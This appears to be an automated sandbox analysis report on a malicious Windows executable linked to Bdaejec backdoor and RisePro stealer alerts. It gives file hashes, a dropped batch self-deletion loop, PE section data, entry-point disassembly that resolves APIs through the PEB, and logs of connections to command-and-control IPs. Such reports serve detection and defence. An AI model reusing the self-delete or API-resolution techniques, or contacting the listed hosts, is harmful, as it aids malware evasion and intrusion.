                                  SHA-256:6A5D90FD2237C9FF4D609EC1EB4D2B4E891568A554154A39F14D5B200AB2CD13
                                  SHA-512:5727DAAC182456F82B2D4F0996CCCB0300FD2A544F569014E7798874031113A8C7EF5A0B1015217CABC5DB20A6B7E79D2910E3F0DD58213C3A47513F47CC039A
                                  Malicious:false
                                  Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\MlpxPf.exe"..if exist "C:\Users\user\AppData\Local\Temp\MlpxPf.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\43f50b5b.bat"..
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:modified
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):15872
                                  Entropy (8bit):7.031075575407894
                                  Encrypted:false
                                  SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                  MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                  SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                  SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                  SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 92%
                                  Joe Sandbox View:
                                  • Filename: Lisect_AVT_24003_G1A_70.exe, Detection: malicious, Browse
                                  • Filename: Lisect_AVT_24003_G1A_72.exe, Detection: malicious, Browse
                                  • Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse
                                  • Filename: Lisect_AVT_24003_G1A_16.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002C_193.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002C_196.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002B_91.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002B_492.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002B_97.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:modified
                                  Size (bytes):13
                                  Entropy (8bit):2.4116022179746714
                                  Encrypted:false
                                  SSDEEP:3:LEfUaWO:4U6
                                  MD5:106D833AA2CDB26927462EB59D1FDCFF
                                  SHA1:98120D54BBA06EB97399DEA812463DCDB4C21FB4
                                  SHA-256:8672E274B253B3E2280558A185EFF8718CE4DA86D8220FAFD6052618410B5650
                                  SHA-512:25E80AE341F6AB203BE0453F442E640902B23AD6382D604390CD1609092B9556A29C7281E14855FF35AFC6F58FDA67D869BE790B478C8927E115DDEB37CC161B
                                  Malicious:false
                                  Preview:1721881383412
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.3724235502129964
                                  Encrypted:false
                                  SSDEEP:6144:mFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNiiL:mV1QyWWI/glMM6kF7Yq
                                  MD5:0DA24B3E8310BDB0144411954CE211F1
                                  SHA1:EA2C551753655DB7F6BECD3BAE477C9C6AD5CD68
                                  SHA-256:E50298F0E4BE72EA173A24A0FF1586E230F58726905F3B8917125E42AF0460CA
                                  SHA-512:6DCA85FD369CC1695D0EF4BA29FF8C0271842965AAA08099CD5BC3A8455060162ABEE2DDD8E14D628440A51D9B0CB04AD7EAAF3278016BCC5548A70793BFAF2A
                                  Malicious:false
                                  Preview:regfD...D....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj/..=..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.930391577466747
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:Lisect_AVT_24003_G1A_37.exe
                                  File size:2'447'360 bytes
                                  MD5:6a672bbdc7865a7518441284d853f8d8
                                  SHA1:be887b22a197194e90f9a090174f258bdb062562
                                  SHA256:a3f809a16001f7edea3b2c946286c80db82531a8cd037320fba6cf8bbcf68284
                                  SHA512:0e4f83cc50cf975d8ccee5d61b009e877b9fbc680b64e04a540a92c9601462ade0182376053fe15d0b8ef1af89dd46c06b25baafd0a597832600c03900afe5ee
                                  SSDEEP:49152:e8GpcxEHvbuWvpD3pQcVTVx5QBUu/ApBsUIjtpULzhhLAJFhr:eRy0pBFrnu/ApBsUIRaLzv6
                                  TLSH:FDB523DC7D4289A3C7D4663058C3F779069ACC86A99800CE3EDD7FB7BA35E292463518
                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....
                                  Icon Hash:7192ecece8b2924d
                                  Entrypoint:0x9d7000
                                  Entrypoint Section:%~u
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x65CC7EFE [Wed Feb 14 08:51:10 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0000016Ch
                                  xor eax, eax
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [ebp-24h], eax
                                  mov dword ptr [ebp-10h], eax
                                  mov dword ptr [ebp-14h], eax
                                  mov dword ptr [ebp-08h], eax
                                  mov dword ptr [ebp-0Ch], eax
                                  mov dword ptr [ebp-20h], eax
                                  mov dword ptr [ebp-18h], eax
                                  mov dword ptr [ebp-48h], 78706C4Dh
                                  mov dword ptr [ebp-44h], 652E6650h
                                  mov dword ptr [ebp-40h], 00006578h
                                  mov dword ptr [ebp-3Ch], 00000000h
                                  call 00007FA4C86F1165h
                                  pop eax
                                  add eax, 00000225h
                                  mov dword ptr [ebp-04h], eax
                                  mov eax, dword ptr fs:[00000030h]
                                  mov dword ptr [ebp-28h], eax
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax], E904C483h
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax+04h], FFFFCD8Fh
                                  mov eax, dword ptr [ebp-28h]
                                  mov eax, dword ptr [eax+0Ch]
                                  mov eax, dword ptr [eax+1Ch]
                                  mov eax, dword ptr [eax]
                                  mov eax, dword ptr [eax+08h]
                                  mov ecx, dword ptr [eax+3Ch]
                                  mov ecx, dword ptr [ecx+eax+78h]
                                  add ecx, eax
                                  mov edi, dword ptr [ecx+1Ch]
                                  mov ebx, dword ptr [ecx+20h]
                                  mov esi, dword ptr [ecx+24h]
                                  mov ecx, dword ptr [ecx+18h]
                                  add esi, eax
                                  add edi, eax
                                  add ebx, eax
                                  xor edx, edx
                                  mov dword ptr [ebp-30h], esi
                                  mov dword ptr [ebp-1Ch], edx
                                  mov dword ptr [ebp-34h], ecx
                                  cmp edx, dword ptr [ebp-34h]
                                  jnc 00007FA4C86F12AEh
                                  movzx ecx, word ptr [esi+edx*2]
                                  mov edx, dword ptr [ebx+edx*4]
                                  mov esi, dword ptr [edi+ecx*4]
                                  add edx, eax
                                  mov ecx, dword ptr [edx]
                                  add esi, eax
                                  cmp ecx, 4D746547h
                                  jne 00007FA4C86F11B4h
                                  cmp dword ptr [edx+04h], 6C75646Fh
                                  jne 00007FA4C86F11ABh
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1490540x68.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1370000x110a0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1491f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x1360000x8f0001a3df3126f5ba5bf1d667445369e6268False0.9992931872814685data7.988087309899931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x1370000x110a00x20004f9236427260519fddc15cf7411ca257False0.9830322265625data7.908465475006033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x1490000x10000x200588e00183b8b4dbb8c7106492f04143dFalse0.14453125data0.9824704719748909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x14a0000x2cc0000x200695ba53710a5719d05251331289e357dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  xhwtmwwr0x4160000x1bd0000x1bca007ff73970910d1f52d5471815d43367a8False0.9615063606972167data7.91333326585716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  tmaftcgf0x5d30000x10000x6005a8f32f49825274c215abc308fc9fe35False0.5950520833333334data5.090080093373078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x5d40000x30000x22003ff11ea398d3ea4e600728c15030b089False0.053423713235294115DOS executable (COM)0.5511361865848894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  %~u0x5d70000x50000x4200872f8de04072afbed97db9961b82cff1False0.7774621212121212data6.934432600748185IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x5c1a280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mRussianRussia0.10367620962971726
                                  RT_GROUP_ICON0x5d22500x14dataRussianRussia1.15
                                  RT_VERSION0x5d22640x2b4dataRussianRussia0.48121387283236994
                                  RT_MANIFEST0x5d25180x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                  RT_MANIFEST0x5d27fe0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                  DLLImport
                                  kernel32.dlllstrcpy
                                  Language of compilation systemCountry where language is spokenMap
                                  RussianRussia
                                  EnglishUnited States
                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                  2024-07-25T04:53:12.283927+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6380653192.168.2.81.1.1.1
                                  2024-07-25T04:53:42.698687+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49722799192.168.2.844.221.84.105
                                  2024-07-25T04:53:25.674940+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4971250500192.168.2.8193.233.132.62
                                  2024-07-25T04:53:20.335736+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4970650500192.168.2.8193.233.132.62
                                  2024-07-25T04:53:36.849216+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4971950500192.168.2.8193.233.132.62
                                  2024-07-25T04:53:22.721123+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4971350500192.168.2.8193.233.132.62
                                  2024-07-25T04:53:30.531280+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49717799192.168.2.844.221.84.105
                                  2024-07-25T04:53:17.362336+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4970650500192.168.2.8193.233.132.62
                                  2024-07-25T04:53:12.855208+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49704799192.168.2.844.221.84.105
                                  2024-07-25T04:53:36.819100+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49720799192.168.2.844.221.84.105
                                  2024-07-25T04:53:16.800194+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49705799192.168.2.844.221.84.105
                                  2024-07-25T04:53:27.676877+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971420.114.59.183192.168.2.8
                                  2024-07-25T04:53:39.900149+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49721799192.168.2.844.221.84.105
                                  2024-07-25T04:54:05.326511+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972320.114.59.183192.168.2.8
                                  2024-07-25T04:53:23.435986+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49711443192.168.2.820.189.173.22
                                  2024-07-25T04:53:33.718695+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49718799192.168.2.844.221.84.105
                                  2024-07-25T04:53:25.690426+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4971350500192.168.2.8193.233.132.62
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 25, 2024 04:53:12.449678898 CEST49704799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:12.454502106 CEST7994970444.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:12.454590082 CEST49704799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:12.499470949 CEST49704799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:12.504234076 CEST7994970444.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:12.855098963 CEST7994970444.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:12.855207920 CEST49704799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:12.855241060 CEST7994970444.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:12.855297089 CEST49704799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:12.867847919 CEST49704799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:12.872669935 CEST7994970444.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:16.367356062 CEST49705799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:16.374183893 CEST7994970544.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:16.374273062 CEST49705799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:16.374454975 CEST49705799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:16.380223989 CEST7994970544.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:16.800087929 CEST7994970544.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:16.800194025 CEST49705799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:16.800203085 CEST7994970544.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:16.800251961 CEST49705799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:16.801208019 CEST49705799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:16.805984974 CEST7994970544.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:17.329340935 CEST4970650500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:17.334285975 CEST5050049706193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:17.334409952 CEST4970650500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:17.362335920 CEST4970650500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:17.367249012 CEST5050049706193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:20.335736036 CEST4970650500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:20.342374086 CEST5050049706193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:22.677882910 CEST4971250500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:22.680994034 CEST4971350500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:22.689771891 CEST5050049712193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:22.689855099 CEST4971250500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:22.692267895 CEST5050049713193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:22.692344904 CEST4971350500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:22.717916965 CEST4971250500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:22.721122980 CEST4971350500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:22.722872019 CEST5050049712193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:22.726083040 CEST5050049713193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:25.674940109 CEST4971250500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:25.689497948 CEST5050049712193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:25.690426111 CEST4971350500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:25.695415020 CEST5050049713193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:30.104712009 CEST49717799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:30.109580040 CEST7994971744.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:30.109664917 CEST49717799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:30.109827995 CEST49717799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:30.114590883 CEST7994971744.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:30.531214952 CEST7994971744.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:30.531235933 CEST7994971744.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:30.531280041 CEST49717799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:30.531328917 CEST49717799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:30.533118963 CEST49717799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:30.537950993 CEST7994971744.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:33.312210083 CEST49718799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:33.317240953 CEST7994971844.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:33.317521095 CEST49718799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:33.321059942 CEST49718799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:33.325908899 CEST7994971844.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:33.718573093 CEST7994971844.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:33.718594074 CEST7994971844.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:33.718694925 CEST49718799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:33.719923019 CEST49718799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:33.724747896 CEST7994971844.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:33.844114065 CEST4971950500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:33.849138021 CEST5050049719193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:33.849245071 CEST4971950500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:33.885987043 CEST4971950500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:33.890839100 CEST5050049719193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:36.231684923 CEST49720799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:36.239444971 CEST7994972044.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:36.239554882 CEST49720799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:36.239727020 CEST49720799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:36.244540930 CEST7994972044.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:36.819010019 CEST7994972044.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:36.819031954 CEST7994972044.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:36.819099903 CEST49720799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:36.819117069 CEST7994972044.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:36.819149017 CEST49720799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:36.820502996 CEST49720799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:36.825462103 CEST7994972044.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:36.849215984 CEST4971950500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:36.854238033 CEST5050049719193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:38.718920946 CEST5050049706193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:38.719118118 CEST4970650500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:39.497484922 CEST49721799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:39.502538919 CEST7994972144.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:39.502651930 CEST49721799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:39.504205942 CEST49721799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:39.509083986 CEST7994972144.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:39.900060892 CEST7994972144.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:39.900149107 CEST49721799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:39.915069103 CEST7994972144.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:39.915142059 CEST49721799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:39.916049957 CEST49721799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:39.920783997 CEST7994972144.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:42.296803951 CEST49722799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:42.301835060 CEST7994972244.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:42.301956892 CEST49722799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:42.302660942 CEST49722799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:42.307512045 CEST7994972244.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:42.698484898 CEST7994972244.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:42.698620081 CEST7994972244.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:42.698687077 CEST49722799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:42.698687077 CEST49722799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:42.699848890 CEST49722799192.168.2.844.221.84.105
                                  Jul 25, 2024 04:53:42.704643965 CEST7994972244.221.84.105192.168.2.8
                                  Jul 25, 2024 04:53:44.054110050 CEST5050049712193.233.132.62192.168.2.8
                                  Jul 25, 2024 04:53:44.054214954 CEST4971250500192.168.2.8193.233.132.62
                                  Jul 25, 2024 04:53:44.074085951 CEST5050049713193.233.132.62192.168.2.8
